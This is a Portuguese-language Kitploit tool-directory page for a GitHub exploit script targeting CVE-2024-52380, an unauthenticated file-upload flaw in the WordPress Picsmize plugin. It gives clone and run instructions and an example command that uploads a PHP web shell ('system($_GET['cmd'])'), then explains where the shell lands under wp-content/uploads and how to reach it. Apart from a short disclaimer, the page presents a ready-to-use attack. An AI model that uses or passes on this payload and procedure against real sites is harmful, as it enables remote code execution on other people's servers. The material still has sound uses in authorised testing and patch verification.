Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-52380-Exploit — O plugin Picsmize para WordPress é vulnerável a upload arbitrário de arquivos. | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-52380-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubnxploited/cve-2024-52380-exploit

CVE-2024-52380-Exploit

O plugin Picsmize para WordPress é vulnerável a upload arbitrário de arquivos.

Ver Repositório
31há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-52380-Exploit

O plugin Picsmize para WordPress é vulnerável a upload arbitrário de arquivos.

Descrição

Este script explora uma vulnerabilidade (CVE-2024-52380) no plugin Picsmize para WordPress, permitindo que atacantes não autenticados realizem upload arbitrário de arquivos. Essa vulnerabilidade existe em todas as versões do Picsmize até e incluindo a 1.0.0. A exploração dessa vulnerabilidade pode resultar em execução remota de código no servidor alvo.

🌟 Recursos

  • Verificar versão do plugin: Verifica automaticamente se o site WordPress alvo está usando uma versão vulnerável do plugin Picsmize.
  • Exploração de upload de arquivo: Envia payloads PHP arbitrários para o servidor alvo se o site estiver vulnerável.
  • Interface de linha de comando: CLI de fácil utilização para especificar URLs alvo e payloads.

📖 Detalhes da Vulnerabilidade

  • Nome do plugin: Picsmize
  • Versões afetadas: Todas as versões ≤ 1.0.0
  • Tipo de vulnerabilidade: Upload arbitrário de arquivo sem autenticação
  • ID do CVE: CVE-2024-52380

🚀 Instruções de Uso

Pré-requisitos

  • Python 3.7 ou superior
  • Biblioteca requests (pip install requests)

Executando o script

  1. Clone o repositório:
    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
    cd CVE-2024-52380-Exploit
    

Uso -help:

root@kitploit:~
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]

Check plugin version and upload a PHP file to a WordPress site.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
  -c CONTENT, --content CONTENT
                        Content of the PHP file to be uploaded.

Exemplo

root@kitploit:~
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"

Argumentos de Linha de Comando

O script fornece dois argumentos de linha de comando para facilitar o uso:

  1. -u / --url (obrigatório):

    • Finalidade: Especifica a URL base do site WordPress alvo.
    • Exemplo:
      root@kitploit:~
      -u http://example.com
      
  2. -c / --content (opcional):

    • Finalidade: Define o conteúdo do payload PHP a ser enviado.
    • Valor padrão:
      root@kitploit:~
      <?php phpinfo(); ?>
      
    • Exemplo:
      root@kitploit:~
      -c "<?php system($_GET['cmd']); ?>"
      

📂 Caminho do Upload do Arquivo

Explicação:

  • /wordpress: Diretório raiz do site WordPress.
  • wp-content/uploads: Diretório padrão para uploads de mídia no WordPress.
  • 2025/01: A estrutura de diretórios corresponde ao ano (2025) e mês (janeiro) com base na configuração de data do servidor.

Como acessar o arquivo enviado:

  1. Após um upload bem-sucedido, navegue até o arquivo usando a URL completa.
    Exemplo:

http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php

⚠️ Aviso Legal

Este script é destinado apenas a fins educacionais e testes de segurança autorizados. O uso não autorizado desta ferramenta contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e antiético.

Baixar ferramenta